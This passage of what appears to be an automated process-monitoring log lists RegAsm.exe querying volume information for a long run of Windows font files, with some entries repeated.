Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
